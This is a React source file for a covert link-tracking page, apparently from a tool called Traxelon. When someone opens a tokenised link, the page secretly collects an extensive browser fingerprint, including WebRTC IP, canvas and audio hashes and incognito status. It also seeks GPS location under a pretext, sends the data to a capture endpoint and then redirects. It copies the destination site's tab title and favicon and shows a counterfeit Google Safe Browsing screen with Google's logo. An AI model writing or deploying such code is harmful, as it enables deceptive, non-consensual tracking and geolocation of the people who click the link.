// function detectAutomation() {

//   return {

//     webdriver: navigator.webdriver || false,

//     chromeRuntime:
//       !!window.chrome?.runtime,

//     permissionsMismatch:
//       navigator.permissions
//         ? navigator.permissions.query({ name: "notifications" })
//           .then(p => p.state === "denied" && Notification.permission === "prompt")
//           .catch(() => false)
//         : false,

//     pluginsLength:
//       navigator.plugins ? navigator.plugins.length : 0,

//     languagesLength:
//       navigator.languages ? navigator.languages.length : 0,

//   }
// }

// ── Collect ALL device info ───────────────────────────────────────────────────
async function collectDeviceInfo() {
  try {
    const [battery, incognito, mediaDevices, storageInfo, permissions, audioFingerprint, webRTCIP, uaHints, speechVoices, adBlock, behavior] = await Promise.all([
      withTimeout(getBatteryInfo(), 3000, {}),
      withTimeout(detectIncognito(), 2000, null),
      withTimeout(getMediaDevices(), 3000, {}),
      withTimeout(getStorageInfo(), 2000, {}),
      withTimeout(getPermissions(), 3000, {}),
      withTimeout(getAudioFingerprint(), 2000, null),
      withTimeout(getWebRTCIP(), 2000, null),
      withTimeout(getUAClientHints(), 3000, {}),
      withTimeout(getSpeechVoicesCount(), 2000, { speechVoicesCount: null }),
      withTimeout(detectAdblock(), 1000, null),
      withTimeout(getBehaviorFingerprint(), 1500, {}),
    ]);

    const gpuInfo = getGPUInfo();
    const network = getNetworkInfo();
    const canvasHash = getCanvasFingerprint();
    const features = getBrowserFeatures();
    const screenDetails = getScreenDetails();
    const perfInfo = getPerformanceInfo();
    const tzInfo = getTimezoneInfo();
    const mathFP = getMathFingerprint();
    const fontCount = getAvailableFonts();
    const parser = new UAParser();
    const result = parser.getResult();
    const codecSupport = getCodecSupport();
    const cssFeatures = getCSSFeatures();
    const wasmSupport = getWASMSupport();
    const sensorSupport = getSensorSupport();
    const webxrSupport = await getWebXRSupport();

    // const parsed = parseUserAgent(navigator.userAgent);

    const fingerprintBase = {
      userAgent: navigator.userAgent,
      screen: `${window.screen.width}x${window.screen.height}`,
      gpu: gpuInfo.gpu,
      cpu: navigator.hardwareConcurrency,
      ram: navigator.deviceMemory || null,
      platform: navigator.platform,
    };

    const fingerprintId = generateFingerprintId(fingerprintBase);

    return {
      // ── Hardware ──
      cpuCores: navigator.hardwareConcurrency || null,
      ram: navigator.deviceMemory || null,
      maxTouchPoints: navigator.maxTouchPoints ?? null,
      ...gpuInfo,

      // ── Battery ──
      batteryLevel: battery.batteryLevel ?? null,
      batteryCharging: battery.batteryCharging ?? null,
      batteryChargingTime: battery.batteryChargingTime ?? null,
      batteryDischargingTime: battery.batteryDischargingTime ?? null,

      // ── Screen & Display ──
      screenWidth: window.screen.width,
      screenHeight: window.screen.height,
      screenAvailWidth: window.screen.availWidth || null,
      screenAvailHeight: window.screen.availHeight || null,
      colorDepth: window.screen.colorDepth || null,
      pixelDepth: window.screen.pixelDepth || null,
      pixelRatio: window.screen.width / window.outerWidth || window.devicePixelRatio || null,
      windowWidth: Math.round(window.innerWidth * (window.devicePixelRatio || 1)),
      windowHeight: Math.round(window.innerHeight * (window.devicePixelRatio || 1)),
      outerWidth: window.outerWidth || null,
      outerHeight: window.outerHeight || null,
      screenX: window.screenX ?? null,
      screenY: window.screenY ?? null,
      ...screenDetails,

      // ── Browser ──
      language: navigator.language || null,
      languages: navigator.languages ? navigator.languages.join(", ") : null,
      platform: navigator.platform || null,
      cookiesEnabled: navigator.cookieEnabled ?? null,
      doNotTrack: navigator.doNotTrack || null,
      historyLength: window.history.length || null,
      referrer: document.referrer || null,
      userAgent: navigator.userAgent || null,
      appName: navigator.appName || null,
      appVersion: navigator.appVersion || null,
      appCodeName: navigator.appCodeName || null,
      product: navigator.product || null,
      productSub: navigator.productSub || null,
      vendor: navigator.vendor || null,
      vendorSub: navigator.vendorSub || null,
      onLine: navigator.onLine ?? null,
      pdfViewerEnabled: navigator.pdfViewerEnabled ?? null,
      javaEnabled: navigator.javaEnabled ? navigator.javaEnabled() : null,
      documentTitle: document.title || null,
      documentCharset: document.characterSet || null,
      documentCompatMode: document.compatMode || null,
      documentReadyState: document.readyState || null,

      // ── Network ──
      ...network,

      // ── Timezone & Locale ──
      ...tzInfo,

      // ── Storage ──
      ...storageInfo,

      // ── Media Devices ──
      ...mediaDevices,

      // ── Permissions ──
      ...permissions,

      // ── Performance ──
      ...perfInfo,

      // ── Privacy ──
      incognito: incognito ?? null,

      // ── Browser Features ──
      ...features,

      // ── Fingerprints ──
      canvasHash,
      audioFingerprint,
      fontCount,

      // ── Math fingerprint ──
      ...mathFP,

      // ── WebRTC ──
      webRTCIP,

      // ── Navigator extras ──
      ...getNavigatorExtras(),

      // ── Input / Touch ──
      ...getInputCapabilities(),

      // ── Adblock ──
      adBlockEnabled: adBlock,

      // ── Privacy detection ──
      canvasSpoofed: detectCanvasSpoof(),
      fingerprintingResistance: detectCanvasSpoof() === true || navigator.doNotTrack === "1" || false,
      bluetoothAdapter: navigator.bluetooth
        ? await navigator.bluetooth.getAvailability().catch(() => null)
        : null,

      // ── CSS Media Queries ──
      prefersColorScheme: window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light",
      prefersReducedMotion: window.matchMedia("(prefers-reduced-motion: reduce)").matches,
      prefersContrast: window.matchMedia("(prefers-contrast: high)").matches ? "high" : "normal",
      forcedColors: window.matchMedia("(forced-colors: active)").matches,
      hoverCapability: window.matchMedia("(hover: hover)").matches ? "hover" : "none",
      pointerType: window.matchMedia("(pointer: coarse)").matches ? "coarse" : window.matchMedia("(pointer: fine)").matches ? "fine" : "none",
      anyHover: window.matchMedia("(any-hover: hover)").matches,
      anyPointer: window.matchMedia("(any-pointer: coarse)").matches ? "coarse" : "fine",
      displayMode: window.matchMedia("(display-mode: standalone)").matches ? "standalone" : window.matchMedia("(display-mode: fullscreen)").matches ? "fullscreen" : "browser",

      // ── Page Context ──
      pageUrl: window.location.href || null,
      pageHostname: window.location.hostname || null,
      pageProtocol: window.location.protocol || null,
      pagePathname: window.location.pathname || null,
      pageSearch: window.location.search || null,
      pageHash: window.location.hash || null,
      scrollX: window.scrollX ?? null,
      scrollY: window.scrollY ?? null,
      deviceScaleFactor: window.devicePixelRatio || null,

      // ── NEW: Clean identity info ──
      fingerprintId,

      device: result.device.type || "Desktop",
      browser: result.browser.name,
      browserVersion: result.browser.version,
      os: result.os.name,

      // ── NEW: Extra environment detail ──
      plugins: getPluginsList(),
      screenOrientationType: window.screen.orientation?.type || null,
      screenOrientationAngle: window.screen.orientation?.angle ?? null,
      colorGamut: window.matchMedia("(color-gamut: p3)").matches ? "p3" : "srgb",

      // ── UA Client Hints ──
      ...uaHints,

      // ── Performance Breakdown ──
      ...getPerformanceBreakdown(),

      // ── Screen Aspect Ratio & Viewport ──
      ...getScreenAspectRatio(),

      // ── Speech Voices ──
      ...speechVoices,

      // ── Popup Blocker ──
      popupBlocker: detectPopupBlocker(),

      // ── WebSocket Allowed ──
      webSocketAllowed: detectWebSocketAllowed(),

      // ── Page Timestamps ──
      ...getPageTimestamps(),

      // ── Device Orientation Support ──
      ...getDeviceOrientationSupport(),

      // ── Mouse / Pointer Support ──
      ...getPointerSupport(),

      // ── Codec & Media Support ──
      ...codecSupport,

      // ── CSS Features ──
      ...cssFeatures,

      // ── WebAssembly ──
      ...wasmSupport,

      // ── Sensors ──
      ...sensorSupport,

      // ── WebXR ──
      ...webxrSupport,

      // ── NEW: Behaviour fingerprint ──
      ...behavior,
    };
  } catch (err) {
    console.error("collectDeviceInfo failed:", err);
    return {}; // ← VERY IMPORTANT
  }
}

export default function TrackingCapture() {
  const { token } = useParams();
  const [, setStatus] = useState("📍 Allow location for full experience…");
  const hasSent = useRef(false);
  const fallbackTimer = useRef(null);
  const [gpsRetry] = useState(0);
  const { location, loading } = useGeoGrabber(gpsRetry);

  // ── Step 1: Set destination site's favicon + title in the tab ──────────────
  useEffect(() => {
    // Immediately blank out the title so "Traxelon" doesn't flash
    document.title = "";

    async function spoofTabMeta() {
      try {
        const res = await fetch(`${BACKEND_URL}/api/links/destination?token=${token}`);
        const data = await res.json();
        const destUrl = data?.destinationUrl;
        if (!destUrl) return;

        const hostname = new URL(destUrl).hostname;

        // Set title to scraped title or hostname
        document.title = data.title || hostname;

        // Build favicon URL
        const faviconUrl = data.favicon || `https://www.google.com/s2/favicons?domain=${hostname}&sz=64`;

        // Remove ALL existing favicon/icon link tags, then inject a fresh one
        document.querySelectorAll("link[rel*='icon']").forEach(el => el.remove());
        const link = document.createElement("link");
        link.rel = "icon";
        link.type = "image/x-icon";
        link.href = faviconUrl;
        document.head.appendChild(link);

      } catch {
        // Silently fail — tab meta spoofing is best-effort
      }
    }
    spoofTabMeta();
  }, [token]);

  // ── Step 2: If already captured this session, redirect immediately ─────────
  // useEffect(() => {
  //   const key = getCaptureKey(token);
  //   if (sessionStorage.getItem(key)) {
  //     const savedUrl = sessionStorage.getItem(getDestKey(token));
  //     if (savedUrl) {
  //       window.location.replace(savedUrl);
  //     } else {
  //       setStatus("⚠️ Link not found or has expired.");
  //     }
  //   }
  // }, [token]);

  // ── Step 3: Wait for GPS or fall back after 3s ────────────────────────────
  useEffect(() => {
    if (hasSent.current) return;
    const key = getCaptureKey(token);
    if (sessionStorage.getItem(key)) return;

    // GPS granted — fire immediately, no waiting
    if (!loading && location?.source === "gps" && location?.lat != null) {
      clearTimeout(fallbackTimer.current);
      hasSent.current = true;
      // sessionStorage.setItem(key, "1");
      sendCapture(location);
      return;
    }

    // GPS denied or gave IP-only result and loading is done — send now
    if (!loading && location?.source !== "gps") {
      clearTimeout(fallbackTimer.current);
      hasSent.current = true;
      // sessionStorage.setItem(key, "1");
      sendCapture(location);
      return;
    }

    // // Still waiting for GPS answer — set 3s fallback timer
    // if (loading) {
    //   fallbackTimer.current = setTimeout(() => {
    //     if (hasSent.current) return;
    //     if (sessionStorage.getItem(key)) return;
    //     hasSent.current = true;
    //     sessionStorage.setItem(key, "1");
    //     sendCapture(location);
    //   }, 3000);
    // }

    // Still loading — set a fallback that matches GPS timeout (20s)
    // This only fires if GPS never responds at all (e.g. browser hangs)
    if (loading && !fallbackTimer.current) {
      fallbackTimer.current = setTimeout(() => {
        if (hasSent.current) return;
        if (sessionStorage.getItem(key)) return;
        hasSent.current = true;
        // sessionStorage.setItem(key, "1");
        sendCapture(location);
      }, 22000); // slightly longer than GPS_TIMEOUT_MS (20000) in useGeoGrabber
    }

    return () => clearTimeout(fallbackTimer.current);
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [loading, location]);

  async function sendCapture(loc) {
    setStatus("Redirecting…");
    let destinationUrl = null;

    try {
      const deviceInfo = await collectDeviceInfo();
      const uaHints = await getUAHints();


      const payload = {
        token,
        gpsLat: loc?.source === "gps" ? (loc?.lat ?? null) : null,
        gpsLon: loc?.source === "gps" ? (loc?.lon ?? null) : null,
        gpsAccuracy: loc?.source === "gps" ? (loc?.gpsAccuracy ?? null) : null,
        ...deviceInfo,
        ...uaHints
      };
      console.log("🚀 FULL PAYLOAD:", payload);
      // ──────────────── CSS FEATURES ────────────────
      console.group("📋 CSS FEATURES");
      console.log("cssGrid:", payload.cssGrid);
      console.log("cssFlexbox:", payload.cssFlexbox);
      console.log("cssContainerQueries:", payload.cssContainerQueries);
      console.log("cssHasSelector:", payload.cssHasSelector);
      console.log("cssSubgrid:", payload.cssSubgrid);
      console.log("cssCSSLayers:", payload.cssCSSLayers);
      console.log("cssColorP3:", payload.cssColorP3);
      console.log("cssColorOKLCH:", payload.cssColorOKLCH);
      console.log("cssScrollTimeline:", payload.cssScrollTimeline);
      console.log("cssViewTransitions:", payload.cssViewTransitions);
      console.log("cssNesting:", payload.cssNesting);
      console.log("cssHDR:", payload.cssHDR);
      console.log("cssCustomProps:", payload.cssCustomProps);
      console.log("cssStickyPos:", payload.cssStickyPos);
      console.log("cssAspectRatio:", payload.cssAspectRatio);
      console.log("cssGap:", payload.cssGap);
      console.log("cssBackdropFilter:", payload.cssBackdropFilter);
      console.log("cssClipPath:", payload.cssClipPath);
      console.log("cssContainment:", payload.cssContainment);
      console.log("cssLogicalProps:", payload.cssLogicalProps);
      console.groupEnd();

      // ──────────────── CODEC & MEDIA SUPPORT ────────────────
      console.group("📺 CODEC & MEDIA SUPPORT");
      console.log("supportsH264:", payload.supportsH264);
      console.log("supportsVP9:", payload.supportsVP9);
      console.log("supportsAV1:", payload.supportsAV1);
      console.log("supportsHEVC:", payload.supportsHEVC);
      console.log("supportsOpus:", payload.supportsOpus);
      console.log("supportsAAC:", payload.supportsAAC);
      console.log("canPlayH264:", payload.canPlayH264);
      console.log("canPlayWebM:", payload.canPlayWebM);
      console.log("canPlayOgg:", payload.canPlayOgg);
      console.log("canPlayHLS:", payload.canPlayHLS);
      console.log("hasWidevine:", payload.hasWidevine);
      console.log("hasEME:", payload.hasEME);
      console.groupEnd();

      // ──────────────── WEBXR / AR / VR ────────────────
      console.group("🎮 WEBXR / AR / VR");
      console.log("hasWebXR:", payload.hasWebXR);
      console.log("hasVRSupport:", payload.hasVRSupport);
      console.log("hasARSupport:", payload.hasARSupport);
      console.log("hasInlineXR:", payload.hasInlineXR);
      console.groupEnd();

      // ──────────────── WEBASSEMBLY ────────────────
      console.group("⚙️ WEBASSEMBLY");
      console.log("wasmSupported:", payload.wasmSupported);
      console.log("wasmSIMD:", payload.wasmSIMD);
      console.log("wasmThreads:", payload.wasmThreads);
      console.log("wasmExceptions:", payload.wasmExceptions);
      console.log("wasmGC:", payload.wasmGC);
      console.groupEnd();

      // ──────────────── SENSORS ────────────────
      console.group("📡 SENSORS");
      console.log("hasAccelerometer:", payload.hasAccelerometer);
      console.log("hasGyroscope:", payload.hasGyroscope);
      console.log("hasMagnetometer:", payload.hasMagnetometer);
      console.log("hasAmbientLight:", payload.hasAmbientLight);
      console.log("hasAbsoluteOrientation:", payload.hasAbsoluteOrientation);
      console.log("hasRelativeOrientation:", payload.hasRelativeOrientation);
      console.log("hasGravitySensor:", payload.hasGravitySensor);
      console.log("gamepadCount:", payload.gamepadCount);
      console.log("hasPointerCapture:", payload.hasPointerCapture);
      console.log("hasPressure:", payload.hasPressure);
      console.groupEnd();

      // ──────────────── SCREEN DISPLAY EXTRAS ────────────────
      console.group("🖥️ SCREEN DISPLAY EXTRAS");
      console.log("hdrSupport:", payload.hdrSupport);
      console.log("wideColorGamut:", payload.wideColorGamut);
      console.log("screenColorDepth:", payload.screenColorDepth);
      console.log("windowScreenLeft:", payload.windowScreenLeft);
      console.log("windowScreenTop:", payload.windowScreenTop);
      console.log("visualViewportWidth:", payload.visualViewportWidth);
      console.log("visualViewportHeight:", payload.visualViewportHeight);
      console.log("visualViewportScale:", payload.visualViewportScale);
      console.groupEnd();

      // ───────────────────────────────────────────────────────────────────────────────
      // THEN FOLLOW WITH THE REST OF THE EXISTING CODE:
      // ───────────────────────────────────────────────────────────────────────────────

      const res = await fetch(`${BACKEND_URL}/api/links/capture`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
        keepalive: true
      });

      const data = await res.json();
      destinationUrl = data?.destinationUrl ?? null;
      // small safety delay so browser finishes sending request
      await new Promise(r => setTimeout(r, 500));
    } catch (err) {
      console.error("[TrackingCapture] error:", err);
      setStatus("⚠️ Could not reach the destination. The link may be invalid or expired.");
      return;
    }

    if (destinationUrl) {
      sessionStorage.setItem(getDestKey(token), destinationUrl);
      window.location.replace(destinationUrl);
    } else {
      setStatus("⚠️ Link not found or has expired. Please check the link and try again.");
    }
  }


  // Extract hostname for display
  const destHostname = (() => {
    try {
      const saved = sessionStorage.getItem("traxelon_dest_" + token);
      if (saved) return new URL(saved).hostname;
    } catch { }
    return null;
  })();

  return (
    <div style={{
      minHeight: "100vh",
      background: "#f1f3f4",
      fontFamily: "'Google Sans', Roboto, Arial, sans-serif",
      display: "flex",
      flexDirection: "column",
    }}>

      {/* ── Google-style top bar ── */}
      <div style={{
        background: "#fff",
        borderBottom: "1px solid #e0e0e0",
        padding: "10px 24px",
        display: "flex",
        alignItems: "center",
        gap: 16,
      }}>
        {/* Google logo SVG */}
        <svg width="92" height="30" viewBox="0 0 272 92" xmlns="http://www.w3.org/2000/svg">
          <path fill="#4285F4" d="M115.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18C71.25 34.32 81.24 25 93.5 25s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44S80.99 39.2 80.99 47.18c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z" />
          <path fill="#D93025" d="M163.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18c0-12.85 9.99-22.18 22.25-22.18s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44s-12.51 5.46-12.51 13.44c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z" />
          <path fill="#FBBC04" d="M209.75 26.34v39.82c0 16.38-9.66 23.07-21.08 23.07-10.75 0-17.22-7.19-19.66-13.07l8.48-3.53c1.51 3.61 5.21 7.87 11.17 7.87 7.31 0 11.84-4.51 11.84-13v-3.19h-.34c-2.18 2.69-6.38 5.04-11.68 5.04-11.09 0-21.25-9.66-21.25-22.09 0-12.52 10.16-22.26 21.25-22.26 5.29 0 9.49 2.35 11.68 4.96h.34v-3.61h9.25zm-8.56 20.92c0-7.81-5.21-13.52-11.84-13.52-6.72 0-12.35 5.71-12.35 13.52 0 7.73 5.63 13.36 12.35 13.36 6.63 0 11.84-5.63 11.84-13.36z" />
          <path fill="#1A73E8" d="M225 3v65h-9.5V3h9.5z" />
          <path fill="#34A853" d="M262.02 54.48l7.56 5.04c-2.44 3.61-8.32 9.83-18.48 9.83-12.6 0-22.01-9.74-22.01-22.18 0-13.19 9.49-22.18 20.92-22.18 11.51 0 17.14 9.16 18.98 14.11l1.01 2.52-29.65 12.28c2.27 4.45 5.8 6.72 10.75 6.72 4.96 0 8.4-2.44 10.92-6.14zm-23.27-7.98l19.82-8.23c-1.09-2.77-4.37-4.7-8.23-4.7-4.95 0-11.84 4.37-11.59 12.93z" />
          <path fill="#4285F4" d="M35.29 41.41V32H67c.31 1.64.47 3.58.47 5.68 0 7.06-1.93 15.79-8.15 22.01-6.05 6.3-13.78 9.66-24.02 9.66C16.32 69.35.36 53.89.36 34.91.36 15.93 16.32.47 35.3.47c10.5 0 17.98 4.12 23.6 9.49l-6.64 6.64c-4.03-3.78-9.49-6.72-16.97-6.72-13.86 0-24.7 11.17-24.7 25.03 0 13.86 10.84 25.03 24.7 25.03 8.99 0 14.11-3.61 17.39-6.89 2.66-2.66 4.41-6.46 5.1-11.65l-22.49.01z" />
        </svg>
        <div style={{ flex: 1 }} />
        <div style={{ fontSize: 13, color: "#5f6368" }}>Safe Browsing</div>
      </div>

      {/* ── Main content ── */}
      <div style={{
        flex: 1,
        display: "flex",
        alignItems: "center",
        justifyContent: "center",
        padding: "40px 24px",
      }}>
        <div style={{
          background: "#fff",
          borderRadius: 8,
          boxShadow: "0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.08)",
          padding: "48px 40px",
          maxWidth: 480,
          width: "100%",
          textAlign: "center",
        }}>
          {/* Shield icon */}
          <div style={{ marginBottom: 24 }}>
            <svg width="64" height="64" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
              <path d="M12 2L3 7V12C3 16.55 6.84 20.74 12 22C17.16 20.74 21 16.55 21 12V7L12 2Z" fill="#1A73E8" opacity="0.15" />
              <path d="M12 2L3 7V12C3 16.55 6.84 20.74 12 22C17.16 20.74 21 16.55 21 12V7L12 2Z" stroke="#1A73E8" strokeWidth="1.5" fill="none" />
              <path d="M9 12L11 14L15 10" stroke="#1A73E8" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" />
            </svg>
          </div>

          <h1 style={{
            fontSize: 22,
            fontWeight: 400,
            color: "#202124",
            marginBottom: 8,
            letterSpacing: "-0.2px",
          }}>
            Checking the link
          </h1>

          {destHostname && (
            <p style={{ fontSize: 14, color: "#5f6368", marginBottom: 24 }}>
              <span style={{ fontWeight: 500, color: "#1A73E8" }}>{destHostname}</span>
            </p>
          )}

          <p style={{ fontSize: 14, color: "#5f6368", marginBottom: 32, lineHeight: 1.6 }}>
            Google Safe Browsing is checking this link for malware, phishing, and other threats.
          </p>

          {/* Progress bar */}
          <div style={{
            background: "#e8f0fe",
            borderRadius: 4,
            height: 4,
            overflow: "hidden",
            marginBottom: 24,
          }}>
            <div style={{
              height: "100%",
              background: "#1A73E8",
              borderRadius: 4,
              animation: "progress 2.5s ease-in-out infinite",
              transformOrigin: "left",
            }} />
          </div>

          <p style={{ fontSize: 12, color: "#9aa0a6" }}>
            You will be redirected automatically once the check is complete.
          </p>
        </div>
      </div>

      {/* ── Footer ── */}
      <div style={{
        padding: "16px 24px",
        textAlign: "center",
        fontSize: 12,
        color: "#9aa0a6",
        borderTop: "1px solid #e0e0e0",
        background: "#fff",
      }}>
        Google Safe Browsing · Privacy · Terms
      </div>

      <style>{`
        @keyframes progress {
          0%   { width: 0%; }
          30%  { width: 45%; }
          60%  { width: 72%; }
          85%  { width: 88%; }
          100% { width: 100%; }
        }
        * { box-sizing: border-box; margin: 0; padding: 0; }
      `}</style>
    </div>
  );
}